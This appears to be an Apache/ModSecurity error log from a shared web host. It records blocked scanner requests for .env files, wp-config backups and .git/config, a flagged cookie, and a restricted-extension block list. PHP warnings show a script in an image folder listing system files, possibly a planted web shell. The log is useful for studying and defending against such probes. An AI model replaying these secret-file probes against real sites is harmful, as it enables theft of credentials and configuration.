[Mon May 11 12:26:28.560488 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:7854] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGu02S6k_SCYd1AVZq68gAAAQQ"]
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/ba/2b00d8a7a1c6aa9b12c34a97bab499ad894965 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/ba/2b00d8a7a1c6aa9b12c34a97bab499ad894965 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/ba/ace5a92cebe79d03cdc0fd768229f657473e1b in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/ba/ace5a92cebe79d03cdc0fd768229f657473e1b in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/ef/e773450c111af5ee977a40dfca9d58f7e73afe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/ef/e773450c111af5ee977a40dfca9d58f7e73afe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 12:26:49.110190 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:59136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env.tmp.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/vue/.env.tmp.archived"] [unique_id "agGu6WS6k_SCYd1AVZq7CwAAAQ0"]
[Mon May 11 12:26:49.111701 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:59136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/vue/.env.tmp.archived"] [unique_id "agGu6WS6k_SCYd1AVZq7CwAAAQ0"]
[Mon May 11 12:26:50.308825 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:59136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGu6WS6k_SCYd1AVZq7CwAAAQ0"]
[Mon May 11 12:26:50.335678 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:59142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env.tmp.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/vue/.env.tmp.archived"] [unique_id "agGu6pkIEwRJMyDaV55a6AAAAU0"]
[Mon May 11 12:26:50.336592 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:59142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/vue/.env.tmp.archived"] [unique_id "agGu6pkIEwRJMyDaV55a6AAAAU0"]
[Mon May 11 12:26:51.554633 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:59142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGu6pkIEwRJMyDaV55a6AAAAU0"]
[Mon May 11 12:27:06.056857 2026] [security2:error] [pid 1254328:tid 1254352] [client 8.217.211.59:35329] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/r/pornown.com"] [unique_id "agGu-kRdw2n9wv6Ai48UkwAAAJc"]
[Mon May 11 12:27:06.057568 2026] [security2:error] [pid 1254328:tid 1254352] [client 8.217.211.59:35329] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/r/pornown.com"] [unique_id "agGu-kRdw2n9wv6Ai48UkwAAAJc"]
[Mon May 11 12:27:06.059129 2026] [security2:error] [pid 1254328:tid 1254352] [client 8.217.211.59:35329] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/r/pornown.com"] [unique_id "agGu-kRdw2n9wv6Ai48UkwAAAJc"]
[Mon May 11 12:27:06.540009 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:37600] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env.local.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/web/.env.local.sample"] [unique_id "agGu-hjZymfuKpjWXeiJgAAAAMM"]
[Mon May 11 12:27:06.540282 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:37600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/web/.env.local.sample"] [unique_id "agGu-hjZymfuKpjWXeiJgAAAAMM"]
[Mon May 11 12:27:07.707788 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:37600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGu-hjZymfuKpjWXeiJgAAAAMM"]
[Mon May 11 12:27:07.734008 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:37606] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env.local.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/web/.env.local.sample"] [unique_id "agGu-0YQeUtAPynIs6xllgAAABM"]
[Mon May 11 12:27:07.734475 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:37606] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/web/.env.local.sample"] [unique_id "agGu-0YQeUtAPynIs6xllgAAABM"]
[Mon May 11 12:27:08.959306 2026] [security2:error] [pid 1254212:tid 1254233] [client 185.177.72.9:37606] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGu-0YQeUtAPynIs6xllgAAABM"]
[Mon May 11 12:27:13.967321 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:48168] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /webhook/.env.tmp2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/webhook/.env.tmp2024"] [unique_id "agGvARjZymfuKpjWXeiJiAAAAMc"]
[Mon May 11 12:27:13.967857 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:48168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/webhook/.env.tmp2024"] [unique_id "agGvARjZymfuKpjWXeiJiAAAAMc"]
[Mon May 11 12:27:15.170429 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:48168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvARjZymfuKpjWXeiJiAAAAMc"]
[Mon May 11 12:27:15.198906 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:48170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /webhook/.env.tmp2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/webhook/.env.tmp2024"] [unique_id "agGvA0Rdw2n9wv6Ai48UnwAAAIQ"]
[Mon May 11 12:27:15.199693 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:48170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/webhook/.env.tmp2024"] [unique_id "agGvA0Rdw2n9wv6Ai48UnwAAAIQ"]
[Mon May 11 12:27:16.446077 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:48170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvA0Rdw2n9wv6Ai48UnwAAAIQ"]
[Mon May 11 12:27:27.062772 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:15858] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /webhook/wp-config.bak.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/webhook/wp-config.bak.orig"] [unique_id "agGvD0YQeUtAPynIs6xlsQAAAA8"]
[Mon May 11 12:27:27.063330 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:15858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/webhook/wp-config.bak.orig"] [unique_id "agGvD0YQeUtAPynIs6xlsQAAAA8"]
[Mon May 11 12:27:29.267902 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.177.72.9:15858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvD0YQeUtAPynIs6xlsQAAAA8"]
[Mon May 11 12:27:29.295943 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:15864] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /webhook/wp-config.bak.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/webhook/wp-config.bak.orig"] [unique_id "agGvEURdw2n9wv6Ai48UsgAAAIA"]
[Mon May 11 12:27:29.296397 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:15864] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/webhook/wp-config.bak.orig"] [unique_id "agGvEURdw2n9wv6Ai48UsgAAAIA"]
[Mon May 11 12:27:30.555668 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:15864] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGvEURdw2n9wv6Ai48UsgAAAIA"]
[Mon May 11 12:27:38.652385 2026] [ssl:error] [pid 1256241:tid 1256270] (EAI 2)Name or service not known: [client 35.204.205.120:51892] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 12:27:38.652886 2026] [ssl:error] [pid 1256241:tid 1256270] AH01941: stapling_renew_response: responder error
[Mon May 11 12:27:39.478896 2026] [security2:error] [pid 1256241:tid 1256270] [client 35.204.205.120:51892] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.habilis.space"] [uri "/.git/config"] [unique_id "agGvG5kIEwRJMyDaV55bGwAAAVg"]
[Mon May 11 12:27:39.479129 2026] [security2:error] [pid 1256241:tid 1256270] [client 35.204.205.120:51892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.habilis.space"] [uri "/.git/config"] [unique_id "agGvG5kIEwRJMyDaV55bGwAAAVg"]
[Mon May 11 12:27:39.479561 2026] [security2:error] [pid 1256241:tid 1256270] [client 35.204.205.120:51892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.habilis.space"] [uri "/403.shtml"] [unique_id "agGvG5kIEwRJMyDaV55bGwAAAVg"]
[Mon May 11 12:27:58.771396 2026] [security2:error] [pid 1254242:tid 1254266] [client 216.73.216.117:6410] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: e21e360301a5d0eb187dfd5dd46d55f2||1778497077||1778496717"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agGvLr4KNmD_mZ_vlf9GCAAAAFU"]
[Mon May 11 12:27:58.771689 2026] [security2:error] [pid 1254242:tid 1254266] [client 216.73.216.117:6410] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agGvLr4KNmD_mZ_vlf9GCAAAAFU"]
[Mon May 11 12:27:59.139743 2026] [security2:error] [pid 1254242:tid 1254266] [client 216.73.216.117:6410] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agGvLr4KNmD_mZ_vlf9GCAAAAFU"]
[Mon May 11 12:28:04.381854 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:32596] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.php.disabled"] [unique_id "agGvNJkIEwRJMyDaV55bOgAAAUo"]
[Mon May 11 12:28:04.382227 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:32596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.php.disabled"] [unique_id "agGvNJkIEwRJMyDaV55bOgAAAUo"]
